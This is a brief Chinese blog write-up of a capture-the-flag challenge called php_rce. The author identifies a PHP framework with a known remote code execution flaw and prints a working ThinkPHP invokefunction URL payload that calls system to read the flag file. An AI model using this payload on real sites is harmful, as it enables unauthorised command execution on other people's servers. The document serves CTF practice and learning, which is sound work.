php_rce-wp

题目:

图片[1]-php_rce-wp-Drton1博客

打开给了PHP框架 再结合 题目名字RCE 很容易想到是nday RCE

直接搜一下:

图片[2]-php_rce-wp-Drton1博客

存在漏洞:

图片[3]-php_rce-wp-Drton1博客

那就简单了 找了一圈找到flag在根目录 直接读:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

图片[4]-php_rce-wp-Drton1博客

© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论